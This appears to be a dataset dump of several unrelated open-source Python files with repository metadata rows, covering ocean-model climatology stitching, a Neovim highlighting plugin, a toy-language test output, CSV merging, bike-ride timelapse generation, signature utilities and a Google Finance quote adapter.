Copyright (c)2017 University of Hawaii under the BSD-License.
"""
import seapy
import numpy as np
import netCDF4
clim_times = ('zeta_time', 'v2d_time', 'v3d_time', 'temp_time', 'salt_time')
def gen_bry_clim(clim_file, grid, bry):
"""
Taking the results of gen_ncks and interpolation, stitch together
climatology files that were interpolated using only the boundary regions
into a single climatology (with no data where interpolation wasn't
performed).
Parameters
----------
clim_file: str,
The name of the output climate file
grid: seapy.model.grid or str,
The output ROMS grid
bry: dict,
A dictionary prescribing the climatology file interpolated for each
boundary side.
{"west":filename, "south":filename}, ...}
Returns
-------
None
"""
grid = seapy.model.asgrid(grid)
# Grab the first dictionary record and use it to determine the number
# of times in the new climatology file
nc = netCDF4.Dataset(bry[list(bry.keys())[0]])
reftime, time = seapy.roms.get_reftime(nc)
times = nc.variables[time][:]
nc.close()
# Create the new climatology file
ncout = seapy.roms.ncgen.create_clim(clim_file,
eta_rho=grid.ln, xi_rho=grid.lm, s_rho=grid.n,
ntimes=len(times), reftime=reftime,
title="stitched from boundary interpolation")
ncout.variables["clim_time"][:] = times
for side in bry:
if bry[side] is None:
continue
ncin = netCDF4.Dataset(bry[side])
for fld in seapy.roms.fields:
idx = [np.s_[:] for i in range(seapy.roms.fields[fld]["dims"] + 1)]
dat = ncin.variables[fld][:]
shp = dat.shape
if side == "west":
idx[-1] = np.s_[:shp[-1]]
pass
elif side == "east":
idx[-1] = np.s_[-shp[-1]:]
pass
elif side == "north":
idx[-2] = np.s_[-shp[-2]:]
pass
elif side == "south":
idx[-2] = np.s_[:shp[-2]]
pass
ncout.variables[fld][idx] = dat
ncout.sync()
ncin.close()
ncout.close()
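# Usage sketch (file names are hypothetical): stitch per-boundary
# interpolations into one climatology, passing None for sides that were not
# interpolated, e.g.
#   gen_bry_clim('my_clim.nc', grid,
#                {"west": "west_clim.nc", "east": None,
#                 "south": "south_clim.nc"})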
| mit | 7,935,772,191,182,559,000 | 28.743902 | 87 | 0.542845 | false | 3.592047 | false | false | false |
arakashic/chromatica.nvim | rplugin/python3/chromatica/__init__.py | 1 | 2408 | # ============================================================================
# FILE: chromatica.py
# AUTHOR: Yanfei Guo <yanf.guo at gmail.com>
# License: MIT license
# ============================================================================
import pynvim
from chromatica import logger
from chromatica.chromatica import Chromatica
import chromatica.util as util
import time
@pynvim.plugin
class ChromaticaPlugin(object):
def __init__(self, vim):
self.__vim = vim
util.use_vim(vim)
@pynvim.function("_chromatica", sync=True)
def init_chromatica(self, args):
self.__chromatica = Chromatica(self.__vim)
self.__vim.vars["chromatica#_channel_id"] = self.__vim.channel_id
@pynvim.rpc_export('chromatica_enable_logging', sync=True)
def enable_logging(self, level, logfile):
if not self.__chromatica.debug_enabled:
logger.setup(self.__vim, level, logfile)
self.__chromatica.debug_enabled = True
self.__chromatica.dump_debug_info()
@pynvim.rpc_export("chromatica_highlight")
def highlight(self, context):
context["rpc"] = "chromatica_highlight"
try:
self.__chromatica.highlight(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_parse")
def parse(self, context):
context["rpc"] = "chromatica_parse"
try:
self.__chromatica.parse(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_delayed_parse")
def delayed_parse(self, context):
context["rpc"] = "chromatica_delayed_parse"
try:
self.__chromatica.delayed_parse(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_print_highlight")
def print_highlight(self, context):
context["rpc"] = "chromatica_print_highlight"
try:
self.__chromatica.print_highlight(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_clear_highlight")
def clear_highlight(self):
self.__chromatica.clear_highlight()
@pynvim.rpc_export("chromatica_show_info", sync=True)
def show_info(self, context):
self.__chromatica.show_info(context)
| mit | 3,550,181,417,143,118,000 | 30.272727 | 78 | 0.583472 | false | 3.541176 | false | false | false |
Pancia/loki-lang | tests/specials.out.py | 1 | 2823 | class Loki:
@staticmethod
def printf(x):
print(x)
@staticmethod
def plus(*args):
return reduce((lambda x, y : x + y), args)
@staticmethod
def minus(*args):
return reduce((lambda x, y : x - y), args)
@staticmethod
def div(*args):
return reduce((lambda x, y : x / y), args)
@staticmethod
def mult(*args):
return reduce((lambda x, y : x * y), args)
@staticmethod
def and_(*args):
return reduce((lambda x, y : x and y), args)
@staticmethod
def or_(*args):
return reduce((lambda x, y : x or y), args)
@staticmethod
def eq(*args):
return not not reduce((lambda x, y : x if x == y else False), args)
@staticmethod
def neq(*args):
return not Loki.eq(*args)
@staticmethod
def lt(*args):
return not not reduce((lambda x, y : y if x < y else False), args)
@staticmethod
def lte(*args):
return not not reduce((lambda x, y : y if x <= y else False), args)
@staticmethod
def gt(*args):
return not not reduce((lambda x, y : y if x > y else False), args)
@staticmethod
def gte(*args):
return not Loki.lt(*args)
@staticmethod
def mod(x, y):
return x % y
@staticmethod
def range(n):
return range(n)
@staticmethod
def get(e, i):
return e[i]
@staticmethod
def set(x, v):
x = v
@staticmethod
def assoc(x, i, v):
x[i] = v
return x
@staticmethod
def in_(x, l):
return (x in l)
@staticmethod
def sc(n, x, l):
return n[x:l]
@staticmethod
def dc(n, x, l):
return n[x::l]
@staticmethod
def dcm(n, x, m, l):
return n[x:m:l]
@staticmethod
def not_ (x):
return not x
#END LOKI HELPER FUNCTIONS
Loki.printf("TODO QUOTED")
Loki.printf("py")
(Loki.printf("print this!") if Loki.lt(1, 2) else Loki.printf("do not print this!"))
x = 5
(Loki.printf("this is wrong") if Loki.gt(x, 10) else Loki.printf("this is right"))
for x in Loki.range(3):
Loki.printf(x)
for x in Loki.range(3):
Loki.printf("x")
Loki.printf(x)
for y in Loki.range(3):
Loki.printf("y")
Loki.printf(y)
Loki.printf(x)
x = 7
Loki.printf(x)
class Rocket():
def __init__(self, x):
self.speed = x
color = "red"
fuel = 7
def lift_off (self):
return Loki.printf(Loki.plus("I'm flying @ ", (self.speed() if callable(self.speed) else self.speed), " speed"))
def toString (self):
return Loki.plus("I'm a ", (self.color() if callable(self.color) else self.color), " rocket")
r = Rocket(7)
Loki.printf((r.speed() if callable(r.speed) else r.speed))
r.speed = 10
Loki.printf((r.speed() if callable(r.speed) else r.speed)) | mit | -6,155,213,670,779,928,000 | 25.148148 | 120 | 0.560397 | false | 3.122788 | false | false | false |
rssenar/PyToolkit | ReMapAndMergeFiles.py | 1 | 2122 |
#!/usr/bin/env python3.4
# ---------------------------------------------------------------------------- #
import csv, os, glob
from Constants import *
from tqdm import tqdm
# ---------------------------------------------------------------------------- #
os.chdir('../../../../Desktop/')
CSVFiles = glob.glob('*.csv')
# ---------------------------------------------------------------------------- #
# Re-Map Column Fields
def ReMapHeaderFields():
for index in tqdm(range(0,len(CSVFiles))):
with open(CSVFiles[index],'rU') as InputFile,\
open('___ReMapped--' + str(CSVFiles[index]),'at') as OutputFile:
Input = csv.reader(InputFile)
Output = csv.writer(OutputFile)
Output.writerow(HeaderRowMain)
FirstLine = True
for line in tqdm(Input):
if FirstLine:
for IndexA in range(0,len(line)):
MatchHeaderFields(line[IndexA], IndexA)
FirstLine = False
else:
Newline = []
for IndexB in range(0,len(HeaderRowMain)):
if IndexB in HeaderDict:
Newline.append(eval(HeaderDict[IndexB]))
else:
Newline.append('')
Output.writerow(Newline)
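# Assumption about the imports from Constants (not shown in this file):
# MatchHeaderFields() appears to populate HeaderDict, mapping an output
# column index to an expression string that is eval()'d against the current
# input row, e.g. something like
#   HeaderDict = {0: "line[2]", 1: "line[0] + ' ' + line[1]"}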
def MultiFileMerge():
FirstFileUseHeaderRow = True
CSVFiles = glob.glob('___*.csv')
for line in tqdm(CSVFiles):
with open(line,'rU') as File,\
open('>>>> MERGED_FILE <<<<.csv','at') as Merge:
OutputClean = csv.writer(Merge)
Input = csv.reader(File)
if FirstFileUseHeaderRow:
for line in tqdm(Input):
OutputClean.writerow(line)
FirstFileUseHeaderRow = False
else:
next(File)
for line in tqdm(Input):
OutputClean.writerow(line)
# ---------------------------------------------------------------------------- #
if __name__ == '__main__':
print('=======================================')
print(' RE-MAP & MERGE ')
print('=======================================')
ReMapHeaderFields()
	MultiFileMerge()
print('=======================================')
print(' COMPLETED ')
print()
| bsd-2-clause | 604,217,898,498,476,300 | 34.966102 | 80 | 0.45853 | false | 4.321792 | false | false | false |
rekab/biketl | biketl.py | 1 | 14700 | #!/usr/bin/python
"""Stitch together timelapse images with a Garmin track.
Draws graphs of Garmin data (speed, HR, cadence, elevation) along with a Google
map of position (updated every 10th of a mile). Google Maps has some very
aggressive rate limits, which means this script has to sleep _a lot_ and
frequently fail. Fortunately, files are staged, and it can pick up where it
left off.
Relies on the EXIF data from the timelapse files to match the track up with the
images.
Tested on Linux with a GoPro Hero3 and a Garmin Edge 500:
https://www.youtube.com/watch?v=Y1VTvU5xEFM
USAGE:
Do to Google Map's aggressive throttling it's best to put this in a loop.
while ! python biketl.py --fitfile=garmin_file.fit --imgsrcglob='images/gopro-source/*.JPG' --stagingdir=/tmp/temp-dir ; do sleep 5m ; done
"""
import argparse
import bisect
import datetime
import glob
import os
import sys
import tempfile
import time
import urllib2
ROOT = os.path.dirname(sys.argv[0])
sys.path.append(os.path.join(ROOT, 'python-fitparse'))
sys.path.append(os.path.join(ROOT, 'motionless'))
sys.path.append(os.path.join(ROOT, 'exif-py'))
from fitparse import activity
from motionless import DecoratedMap, LatLonMarker
from matplotlib import pyplot
from matplotlib import font_manager
from matplotlib.pyplot import np
import EXIF
SEMICIRCLE_RATIO = 180.0/(2**31)
MS_TO_MPH_RATIO = 2.23694
METERS_TO_MILES_RATIO = 0.000621371
METERS_TO_FEET_RATIO = 3.28084
#FONT_PATH = '/home/james/code/biketl/zekton.otf'
NUM_GRAPH_POINTS=100
class ImagesAndPointsDoNotOverlap(RuntimeError):
pass
class NoImagesFound(RuntimeError):
pass
class NoGPSTrack(RuntimeError):
pass
def GetPointsFromActivity(filename):
print 'loading activity %s' % filename
a = activity.Activity(filename)
a.parse()
points = []
for record in a.get_records_by_type('record'):
points.append(Point(record))
return points
class PointList(object):
def __init__(self, fitfile):
self._points = GetPointsFromActivity(fitfile)
self._times = [point.time for point in self._points]
def __getitem__(self, index):
return self._points[index]
def __len__(self):
return len(self._points)
def GetIndexNearestTime(self, t):
if not self._points:
return None
left_index = bisect.bisect_left(self._times, t)
right_index = bisect.bisect_right(self._times, t)
left, right = None, None
if left_index >= len(self._points):
return len(self._points)
if right_index < len(self._points):
left = self._points[left_index]
right = self._points[right_index]
if (t - left.time) < (right.time - t):
return left_index
else:
return right_index
return left_index
def GetPointsNearestTime(self, t, num_points=50):
index = self.GetIndexNearestTime(t)
if index is None:
return None
return self._points[max(0, index - num_points):index+1]
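# Usage sketch (variable names are illustrative): given a PointList built
# from a .fit file, fetch the track leading up to a photo's timestamp with
#   points = pointlist.GetPointsNearestTime(image.time, num_points=100)
#   latest = points[-1]
# bisect keeps each timestamp lookup O(log n) over the sorted point times.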
class Point(object):
CONVERTER = {
'semicircles': SEMICIRCLE_RATIO,
'm/s': MS_TO_MPH_RATIO,
'm': METERS_TO_FEET_RATIO,
}
def __init__(self, record):
self._record = record
@property
def distance(self):
dist = self._record.get_data('distance')
if dist:
return dist * METERS_TO_MILES_RATIO
return 0
@property
def position(self):
return (self.position_lat, self.position_long)
@property
def temp_f(self):
return self.temperature * 9.0 / 5.0 + 32.0
def __getattr__(self, field_name):
data = self._record.get_data(field_name)
if data is None:
return 0
unit_ratio = self.CONVERTER.get(self._record.get_units(field_name), 1)
return data*unit_ratio
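    # Example of the conversion above (numbers illustrative): a raw 'speed'
    # field arrives in m/s, so __getattr__ scales it by MS_TO_MPH_RATIO:
    #   10 m/s -> 10 * 2.23694 = 22.3694 mph
    # Fields without a CONVERTER entry (e.g. heart_rate) use ratio 1, and
    # missing fields read as 0 rather than raising.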
@property
def time(self):
return self._record.get_data('timestamp')
def __repr__(self):
return str(self)
def __str__(self):
return "Time: %s\nPos: %s\nSpeed: %s mph\nHR: %s bpm\nCAD: %s rpm\nAlt: %s feet\nGrade: %d%%\nDist: %s miles\nTemp: %s" % (
self.time.ctime(), self.position, self.speed, self.heart_rate,
        self.cadence, self.altitude, self.grade, self.distance, self.temperature)
class Image(object):
def __init__(self, filename, timeskew=0):
self.filename = filename
self.timeskew = timeskew
with open(filename, 'r') as f:
self._tags = EXIF.process_file(f)
@property
def time(self):
ts = str(self._tags['EXIF DateTimeOriginal'])
return (datetime.datetime.strptime(ts, '%Y:%m:%d %H:%M:%S') +
datetime.timedelta(0, self.timeskew, 0))
def GetImages(files, timeskew=0):
"""Load images.
Args:
files: list of filenames
timeskew: seconds to add to each EXIF timestamp
Returns:
list of Image objects, ordered by exif timestamp (ascending)
"""
print 'Loading and sorting exif data for %d image files...' % len(files)
return sorted([Image(f, timeskew=timeskew) for f in files], key=lambda i:i.time)
def GetMapForPoints(output_dir, file_basename, points, mapdelay=3):
# Map creation is expensive, so check if we've already fetched it.
map_image_fname = os.path.join(output_dir, 'map-%s.png' % file_basename)
latest = points[-1]
if os.path.exists(map_image_fname):
print 'map already exists for %s' % latest
return map_image_fname
print 'getting map for %s' % latest
gmap = DecoratedMap(size_x=200, size_y=200, pathweight=4, pathcolor='red')
gmap.add_marker(
LatLonMarker(*tuple(str(x) for x in points[-1].position), color='red'))
print 'sleeping %s seconds' % mapdelay
time.sleep(mapdelay)
resp = urllib2.urlopen(gmap.generate_url() + '&zoom=11')
f = open(map_image_fname, 'w')
f.write(resp.read())
f.close()
return map_image_fname
def DrawSpeedLabel(speed, ax):
if speed > 25:
font = font_manager.FontProperties(size=14,
weight='bold')
#fname=FONT_PATH)
else:
font = font_manager.FontProperties(size=14)
#fname=FONT_PATH)
desc = ('%.1f MPH' % speed).rjust(8)
# I dislike that pyplot is global, it impinges my customary design.
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
def DrawHeartRateLabel(hr, ax):
color = 'white'
if hr > 165:
desc = ('%d BPM' % hr).rjust(7)
font = font_manager.FontProperties(size=14, weight = 'bold')
#fname=FONT_PATH)
color = 'red'
else:
desc = 'Heart Rate (BPM)'
font = font_manager.FontProperties(size=14) #, fname=FONT_PATH)
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color=color)
def GetFontPropertiesForGrade(grade):
return font_manager.FontProperties(size=14)
#fname=FONT_PATH)
def GetFontPropertiesForCadence(cadence):
return font_manager.FontProperties(size=14)
#fname=FONT_PATH)
def GetPointForLabel(points):
"""Get a point every few seconds, so that numbers are readable."""
# TODO: find the last point at a minute boundary
return points[-1]
def GetLineGraphForPoints(output_dir, file_basename, points):
"""Draw a 1024x160 graph."""
latest = GetPointForLabel(points)
figure = pyplot.figure(latest.time.ctime(), figsize=(10.24, 1), dpi=80)
# TODO: merge speed with cad on the same graph. merge hr with elevation.
ax = pyplot.subplot(1,4,1, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.subplots_adjust(left=0.05, right=1, hspace=0, wspace=0.3)
pyplot.locator_params(nbins=4)
pyplot.ylim(0, 30)
pyplot.gca().get_xaxis().set_visible(False)
DrawSpeedLabel(latest.speed, ax)
pyplot.plot([point.speed for point in points], 'g-', linewidth=2)
ax = pyplot.subplot(1,4,2, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(90, 190)
DrawHeartRateLabel(latest.heart_rate, ax)
pyplot.plot([point.heart_rate for point in points], 'r-', linewidth=2)
ax = pyplot.subplot(1,4,3, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(0, 180)
#desc = ('%d RPM' % latest.cadence).rjust(7)
desc = 'Cadence (RPM)'
font = GetFontPropertiesForCadence(latest.cadence)
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
pyplot.plot([point.cadence for point in points], color='#ffff00', linewidth=2)
ax = pyplot.subplot(1,4,4, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(0, 500) # STP max elevation is 500ft
# TODO: flash the value in bold whenever VAM is > some ft per min.
# e.g. crossing every 100 feet for the first time in a while.
#desc = ('%d feet' % latest.altitude).rjust(11)
desc = 'Elevation (Feet)'
font = GetFontPropertiesForGrade(latest.grade) # XXX: grade is always 0?
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
pyplot.gca().get_xaxis().set_visible(False)
pyplot.plot([point.altitude for point in points], 'c-', linewidth=2)
graph_image_fname = os.path.join(output_dir, 'graph-%s.png' % file_basename)
print 'generating graph %s' % graph_image_fname
pyplot.savefig(graph_image_fname, facecolor='black')
return graph_image_fname
def Run(cmd_str, log=None):
if log:
print '%s:\n %s' % (log, cmd_str)
print 'composing picture and map: %s' % cmd_str
if os.system(cmd_str) != 0:
raise RuntimeError('command "%s" failed' % cmd_str)
def CompositeImages(pic_fname, gmap_fname, graph_fname, msg_bar_str, output_fname):
"""Assumes:
- 4:3 pic
    - 200x200 map
    - 1024x80 graph
- 1024x768 output
"""
# Resize the image down
tmpfile = '/tmp/img-and-map.png'
cmd_str = 'convert -scale 1024x768 %s %s' % (pic_fname, tmpfile)
Run(cmd_str, log='scaling image down')
# Composite the resized picture and the map
cmd_str = 'composite -geometry +797+0 -dissolve 80 %s %s %s' % (
gmap_fname, tmpfile, tmpfile)
Run(cmd_str, log='composing picture and map')
# Add status bar (mileage and time)
cmd_str = ('convert %s '
'-fill "#0008" '
'-draw "rectangle 0,630,1024,665" '
'-fill "#cccccc" '
#'-font %s '
'-pointsize 24 '
'-annotate +10+655 "%s" '
'%s') % (tmpfile, #FONT_PATH,
msg_bar_str, tmpfile)
Run(cmd_str, log='adding status bar (mileage and time)')
# Composite the tempfile with the graph
cmd_str = 'composite -geometry +0+665 -dissolve 50 %s %s %s' % (
graph_fname, tmpfile, output_fname)
Run(cmd_str, log='composing graph and prev composition')
def GetOutputImagePath(output_dir, pic_fname):
return os.path.join(output_dir, 'merged-%s' % os.path.basename(pic_fname))
def CheckImagesAndPointsOverlap(images, pointlist):
"""Verify that points exist for the camera's time, fail otherwise."""
if not len(images):
raise NoImagesFound()
if not len(pointlist):
raise NoGPSTrack('GPS track has 0 points.')
if images[-1].time < pointlist[0].time:
raise ImagesAndPointsDoNotOverlap('Last image occurs before first GPS point.')
if images[0].time > pointlist[-1].time:
raise ImagesAndPointsDoNotOverlap('First image occurs after last GPS point.')
def main():
parser = argparse.ArgumentParser(
description='Timelapse from Garmin bike records.')
  parser.add_argument('--timeskew', type=int,
      help='Add (or subtract) seconds from each EXIF timestamp.',
      default=0)
parser.add_argument('--imgsrcglob', help='Image source glob pattern.',
default='/mnt/james/images/2013/gopro-flaming-geyser/*.JPG')
parser.add_argument('--stagingdir', help='Directory to stage files.',
default='/home/james/tmp/flaming-geyser-output')
parser.add_argument('--fitfile', help='Path to the source Garmin .fit file.',
default='/home/james/garmin/2013-06-22-07-05-20.fit')
parser.add_argument('--loop', help='Iterate over all files.', dest='loop',
action='store_true', default=True)
parser.add_argument('--noloop', help='Iterate over all files.', dest='loop',
action='store_false', default=False)
  parser.add_argument('--mapdelay', type=int,
      help='Number of seconds to sleep after fetching a map.', default=5)
flags = parser.parse_args()
pointlist = PointList(flags.fitfile)
total_distance = pointlist[-1].distance
if not os.path.exists(flags.stagingdir):
print 'making %s' % flags.stagingdir
os.makedirs(flags.stagingdir)
images = GetImages(glob.glob(flags.imgsrcglob), flags.timeskew)
CheckImagesAndPointsOverlap(images, pointlist)
prev_point = None
map_image_fname = None
for image in images:
output_image_path = GetOutputImagePath(flags.stagingdir, image.filename)
# Check if we've already rendered an image based on this source image.
if os.path.exists(output_image_path):
print 'skipping %s' % image.filename
continue
print 'processing %s' % image.filename
# Get the previous N points
points = pointlist.GetPointsNearestTime(image.time, num_points=NUM_GRAPH_POINTS)
latest_point = points[-1]
# Get a graph
img_basename = os.path.basename(image.filename).replace('.JPG', '')
graph_image_fname = GetLineGraphForPoints(flags.stagingdir, img_basename, points)
# Map creation is expensive, so only get a new map if we've moved.
if (map_image_fname
and prev_point
and ('%.1f' % prev_point.distance) == ('%.1f' % latest_point.distance)):
print 'distance unchanged, using last map'
else:
# Get a map
map_image_fname = GetMapForPoints(flags.stagingdir, img_basename, points,
mapdelay=flags.mapdelay)
# Put them all together
elapsed_timedelta = latest_point.time - pointlist[0].time
elapsed_str = ':'.join(str(elapsed_timedelta).split(':')[:2])
msg_bar_str = 'Distance: %.1f miles (%.1f miles to go) Time: %s (%s elapsed) Temp: %dF' % (
latest_point.distance,
total_distance - latest_point.distance,
latest_point.time.strftime('%l:%M %P'),
elapsed_str,
latest_point.temp_f)
CompositeImages(image.filename, map_image_fname, graph_image_fname,
msg_bar_str, output_image_path)
prev_point = latest_point
if not flags.loop:
print 'exiting after one iteration'
sys.exit(0)
# make a movie:
# mencoder "mf://merged-*.JPG" -mf fps=12 -o output.avi -ovc lavc -lavcopts vcodec=mpeg4:mbd=2:trell:vbitrate=7000
if __name__ == '__main__':
main()
| mit | -3,330,803,630,378,907,000 | 31.666667 | 143 | 0.678367 | false | 3.159252 | true | false | false |
epsy/sigtools | sigtools/_util.py | 1 | 4504 | # sigtools - Collection of Python modules for manipulating function signatures
# Copyright (c) 2013-2015 Yann Kaiser
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import inspect
import ast
from functools import update_wrapper, partial
from weakref import WeakKeyDictionary
def get_funcsigs():
import inspect
try:
inspect.signature
except AttributeError:
import funcsigs
return funcsigs
else:
return inspect
funcsigs = get_funcsigs()
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
OrderedDict # quiet pyflakes
class _Unset(object):
__slots__ = ()
def __repr__(self):
return '<unset>'
UNSET = _Unset()
del _Unset
def noop(func):
return func
def qualname(obj):
try:
return obj.__qualname__
except AttributeError:
try:
return '{0.__module__}.{0.__name__}'.format(obj)
except AttributeError:
return repr(obj)
class OverrideableDataDesc(object):
def __init__(self, *args, **kwargs):
original = kwargs.pop('original', None)
if original is not None:
update_wrapper(self, original)
try:
self.custom_getter = kwargs.pop('get')
except KeyError:
def cg(func, **kwargs):
kwargs.update(self.parameters())
return type(self)(func, **kwargs)
self.custom_getter = cg
self.insts = WeakKeyDictionary()
super(OverrideableDataDesc, self).__init__(*args, **kwargs)
def __get__(self, instance, owner):
try:
getter = type(self.func).__get__
except AttributeError:
return self
else:
func = getter(self.func, instance, owner)
try:
return self.insts[func]
except KeyError:
pass
if func is self.func:
ret = self
else:
ret = self.custom_getter(func, original=self)
self.insts[func] = ret
return ret
def safe_get(obj, instance, owner):
try:
get = type(obj).__get__
except (AttributeError, KeyError):
return obj
return get(obj, instance, owner)
def iter_call(obj):
while True:
yield obj
try:
obj = obj.__call__
obj.__code__.co_filename
# raises if this is the __call__ method of a builtin object
except AttributeError:
return
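# Example (illustrative): iter_call walks the __call__ chain of a wrapped
# callable, yielding each layer until it hits a builtin without __code__:
#   class F(object):
#       def __call__(self): pass
#   list(iter_call(F()))   # -> [<F instance>, <bound method F.__call__>]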
partial_ = partial
def get_introspectable(obj, forged=True, af_hint=True, partial=True):
for obj in iter_call(obj):
try:
obj.__signature__
return obj
except AttributeError:
pass
if forged:
try:
obj._sigtools__forger
return obj
except AttributeError:
pass
if af_hint:
try:
obj._sigtools__autoforwards_hint
return obj
except AttributeError:
pass
if partial:
if isinstance(obj, partial_):
return obj
return obj
def get_ast(func):
try:
code = func.__code__
except AttributeError:
return None
try:
rawsource = inspect.getsource(code)
except (OSError, IOError):
return None
source = inspect.cleandoc('\n' + rawsource)
module = ast.parse(source)
return module.body[0]
| mit | -1,107,576,725,662,127,000 | 26.631902 | 79 | 0.613899 | false | 4.446199 | false | false | false |
philipodonnell/paperbroker | paperbroker/adapters/quotes/GoogleFinanceQuoteAdapter.py | 1 | 5613 | import arrow
from ...assets import asset_factory, Option
from ...quotes import OptionQuote, Quote
from .QuoteAdapter import QuoteAdapter
from googlefinance import getQuotes
"""
Get current prices from Google Finance
"""
class GoogleFinanceQuoteAdapter(QuoteAdapter):
def __init__(self):
self._cache = {}
def _set_cache(self, quote):
self._cache[quote.asset.symbol] = quote
return quote
def get_quote(self, asset):
asset = asset_factory(asset)
if self._cache.get(asset.symbol) is not None:
return self._cache.get(asset.symbol)
if isinstance(asset, Option):
options = self.get_options(asset.underlying, asset.expiration_date)
matches = [_ for _ in options if _.asset == asset]
if len(matches) == 0:
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
return matches[0]
else:
google_quotes = getQuotes(asset.symbol)
if google_quotes is None or len(google_quotes) == 0:
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
last_trade = google_quotes[0].get('LastTradeWithCurrency', None)
if last_trade is None or last_trade == '' or last_trade == '-':
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
return Quote(quote_date=arrow.now().format('YYYY-MM-DD'), asset=asset, bid=float(last_trade)-0.01, ask=float(last_trade)+0.01)
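    # Usage sketch (ticker is an example, and this relies on the Google
    # Finance endpoints still answering):
    #   adapter = GoogleFinanceQuoteAdapter()
    #   quote = adapter.get_quote('AAPL')   # equity: last trade +/- 0.01
    # Option assets instead resolve through get_options() for their
    # expiration date and are matched against the full chain.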
def get_expiration_dates(self, underlying_asset=None):
oc = OptionChain('NASDAQ:' + asset_factory(underlying_asset).symbol)
return sorted(list(set([asset_factory(_['s']).expiration_date for _ in (oc.calls + oc.puts)])))
def get_options(self, underlying_asset=None, expiration_date=None):
oc = OptionChain('NASDAQ:' + asset_factory(underlying_asset).symbol)
underlying_quote = self.get_quote(underlying_asset)
out = []
for option in (oc.calls + oc.puts):
if arrow.get(expiration_date).format('YYMMDD') in option['s']:
quote = OptionQuote(quote_date=arrow.now().format('YYYY-MM-DD'),
asset=option['s'],
bid=float(option['b']) if option['b'] != '-' else None,
ask=float(option['a']) if option['a'] != '-' else None,
underlying_price = underlying_quote.price)
self._set_cache(quote)
out.append(quote)
return out
# the code below is from https://github.com/makmac213/python-google-option-chain
import requests
OPTION_CHAIN_URL = 'https://www.google.com/finance/option_chain'
class OptionChain(object):
def __init__(self, q):
"""
Usage:
from optionchain import OptionChain
oc = OptionChain('NASDAQ:AAPL')
# oc.calls
# oc.puts
"""
params = {
'q': q,
'output': 'json'
}
data = self._get_content(OPTION_CHAIN_URL, params)
# get first calls and puts
calls = data['calls']
puts = data['puts']
for (ctr, exp) in enumerate(data['expirations']):
# we already got the first put and call
# skip first
if ctr:
params['expd'] = exp['d']
params['expm'] = exp['m']
params['expy'] = exp['y']
new_data = self._get_content(OPTION_CHAIN_URL, params)
if new_data.get('calls') is not None:
calls += new_data.get('calls')
if new_data.get('puts') is not None:
puts += new_data.get('puts')
self.calls = calls
self.puts = puts
def _get_content(self, url, params):
response = requests.get(url, params=params)
if response.status_code == 200:
content_json = response.content
data = json_decode(content_json)
return data
import json
import token, tokenize
from io import StringIO
# using below solution fixes the json output from google
# http://stackoverflow.com/questions/4033633/handling-lazy-json-in-python-expecting-property-name
def fixLazyJson (in_text):
tokengen = tokenize.generate_tokens(StringIO(in_text.decode('ascii')).readline)
result = []
for tokid, tokval, _, _, _ in tokengen:
# fix unquoted strings
if (tokid == token.NAME):
if tokval not in ['true', 'false', 'null', '-Infinity', 'Infinity', 'NaN']:
tokid = token.STRING
tokval = u'"%s"' % tokval
# fix single-quoted strings
elif (tokid == token.STRING):
if tokval.startswith ("'"):
tokval = u'"%s"' % tokval[1:-1].replace ('"', '\\"')
# remove invalid commas
elif (tokid == token.OP) and ((tokval == '}') or (tokval == ']')):
if (len(result) > 0) and (result[-1][1] == ','):
result.pop()
result.append((tokid, tokval))
return tokenize.untokenize(result)
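# Example of the repair (input is illustrative): Google's "lazy" JSON such as
#   {expiry: {y: 2017, m: 11}, b: '-',}
# becomes strict JSON after re-tokenizing:
#   {"expiry": {"y": 2017, "m": 11}, "b": "-"}
# (unquoted names quoted, single quotes converted, trailing commas dropped).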
def json_decode(json_string):
try:
ret = json.loads(json_string)
except:
json_string = fixLazyJson(json_string)
ret = json.loads(json_string)
return ret | mit | -8,827,368,968,645,760,000 | 30.897727 | 138 | 0.564582 | false | 3.908774 | false | false | false |
Lrcezimbra/subscriptions | subscriptions/core/migrations/0015_auto_20170920_0301.py | 1 | 1828 | # -*- coding: utf-8 -*-
